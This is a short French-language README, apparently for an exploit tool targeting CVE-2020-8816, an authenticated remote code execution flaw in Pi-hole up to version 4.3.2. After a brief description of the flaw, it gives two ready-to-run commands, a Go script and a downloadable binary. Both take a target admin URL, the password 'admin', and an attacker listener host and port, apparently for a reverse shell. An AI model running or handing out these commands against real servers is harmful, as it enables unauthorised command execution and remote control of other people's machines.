
Pi-hole ( <= 4.3.2) exécution de code à distance authentifiée.
Pi-hole (versions <= 4.3.2 ) est affecté par une vulnérabilité d'exécution de code à distance. Un utilisateur authentifié du portail Web peut exécuter une commande arbitraire sur le serveur sous-jacent avec les privilèges de l'utilisateur local exécutant le service.
go run CVE-2020-8816.go -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/
ou téléchargez le binaire CVE-2020-8816 :
./CVE-2020-8816 -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/